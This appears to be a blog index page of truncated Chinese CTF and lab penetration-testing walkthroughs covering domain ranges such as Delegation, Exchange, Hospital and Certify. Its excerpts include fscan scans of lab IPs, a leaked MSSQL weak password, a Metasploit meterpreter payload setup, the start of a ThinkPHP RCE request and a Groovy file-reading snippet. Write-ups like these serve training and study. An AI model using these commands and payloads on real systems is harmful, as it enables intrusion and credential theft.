22网鼎半决
22网鼎半决该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。 tag域渗透、AD CS、内网渗透、Wordpress、Kerberos 信息收集先用fscan扫一下机器./fscan.exe -h 39.98.116.144 -nobr 123456start infoscan39.98.116.144:22 open39.98.116.144:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.98.116.144 code:200 len:39988 title:XIAORANG.LAB 机器26只有一个web服务,访问看看,发现是WordPress先扫一下看看有没有漏洞wpscan –url http://39.98.116.144没什么收获扫一下网站http://39...
Delegation
DelegationDelegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagBrute Force、Privilege Elevation、Kerberos、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.129.242 -nobr 12345678910start infoscan39.99.129.242:21 open39.99.129.242:3306 open39.99.129.242:22 open39.99.129.242:80 open[*] alive ports len is: 4start vulscan[*] WebTitle http://39.99.129.242 code:200 len:68108 title:中文网页标题已完成 4/4[*] 扫描结束,耗时: 8.6680217s 机器36没扫...
Lilctf
Lilctf 2025webez_bottle给出了源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116from bottle import route, run, template, post, request, static_file, errorimport osimport zipfileimport hashlibimport time# hint: flag in /flag , have a tryUPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads'...
exchange
exchangeExchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。 tagJDBC、Exchange、NTLM、Coerce Authentication、DCSync 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.121.30 1234567891011start infoscan39.98.121.30:22 open39.98.121.30:8000 open39.98.121.30:80 open[*] alive ports len is: 3start vulscan[*] WebTitle http://39.98.121.30 code:200 len:19813 title:lumia[*] WebTitle http://39.98.121.30:8000 code:302 len:0 title...
nepctf
NepCTF2025webeasyGooGooVVVY RevengeGooGooVVVY通过尝试发现目标环境对Groovy表达式进行了严格限制,具体表现为: 不允许在[java.nio.file.Files]上调用方法 不允许在[java.lang.Class]上调用方法 不允许在[java.io.BufferedReader]上调用方法 不允许在String上调用execute() 不允许在[java.io.File]上进行属性访问(如.text) def s = new StringBuilder(); def is = new FileInputStream('/proc/1/environ'); int b; while((b=is.read())!=-1) s.append((char)b); s.toString() JavaSeri抓包发现回显有rememberMe参数,判断为shiro框架ShiroAttack2工具一把梭 注意在Java JDK 1.8下运行,其他版本会报错 Safe_bank先注册登录进去,然后发现需要管理员权限,...
Hospital
Hospital在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机。 tagShiro、Fastjson、Decrypt、Nacos、内网渗透 信息收集先用fscan扫一下机器./fscan.exe -h 39.99.155.247 12345678start infoscan39.99.155.247:8080 open39.99.155.247:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.99.155.247:8080 code:302 len:0 title:None 跳转url: http://39.99.155.247:8080/login;jsessionid=C7B44ACB6C849F46C9D5FEBA628E5C41[*] WebTitle http://39.99.155.247:8080/login;jsessionid=C7...
certify
CertifyCertify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagSolr RCE、AD CS、SMB、Kerberos、域渗透 信息收集./fscan.exe -h 39.98.107.120 -nobr 1234567891011start infoscan39.98.107.120:80 open39.98.107.120:22 open39.98.107.120:8983 open[*] alive ports len is: 3start vulscan[*] WebTitle http://39.98.107.120 code:200 len:612 title:Welcome to nginx![*] WebTitle http://39.98.107.120:8983 code:302 len:0 title:None 跳转url:...
time
TimeTime是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagNeo4j、Privilege Elevation、Kerberos、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.107.186 -p 1-65535 -nobr 123456789101112131415161718192021222324 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| <\____/ |___/\___|_| \__,_|\___|_|\_\ ...
Brute4Road
Brute4RoadBrute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 tagRedis、Brute Force、SMB、Privilege Elevation、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.134.237 12345678910111213start infoscan39.99.134.237:22 open39.99.134.237:80 open39.99.134.237:21 open39.99.134.237:6379 open[*] alive ports len is: 4start vulscan[*] WebTitle http://39.99.134.237 code:200 len:4833 title:Welcome to CentOS[+] ftp 39.99.134.237:21:...
tsclient
tsclient春秋云镜域渗透靶场中难度为中等的靶场环境。该靶场有3个flag,各部分位于不同的机器上。 tagMSSQL、Privilege Elevation、Kerberos、域渗透、RDP 信息搜集先用fscan扫一下机器./fscan.exe -h 39.98.113.109 1234567start infoscan39.98.113.109:80 open39.98.113.109:1433 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.98.113.109 code:200 len:703 title:IIS Windows Server[+] mssql 39.98.113.109:1433:sa 1qaz!QAZ 机器18显示MSSQL数据库存在弱口令:用户名为sa,密码为1qaz!QAZ。 12345678use exploit/windows/mssql/mssql_payloadset payload windows/x64/meterpreter/bin...
justctf
justctfwebPositive Players123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193...
initial
Initial春秋云镜域渗透靶场中难度为简单的靶场环境。该靶场只有一个flag,各部分位于不同的机器上。 tagDCSync、CVE、域渗透 信息搜集先用fscan扫一下机器./fscan.exe -h 39.99.138.127 -nobr 1234567start infoscan39.99.138.127:22 open39.99.138.127:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.99.138.127 code:200 len:5578 title:Bootstrap Material Admin[+] PocScan http://39.99.138.127 poc-yaml-thinkphp5023-method-rce poc1 发现thinkphp5023这个rce漏洞,搜索相关漏洞,payload如下 123456789101112131415POST /index.php?s=captcha HTTP/1.1Host: 39.99.138.127C...
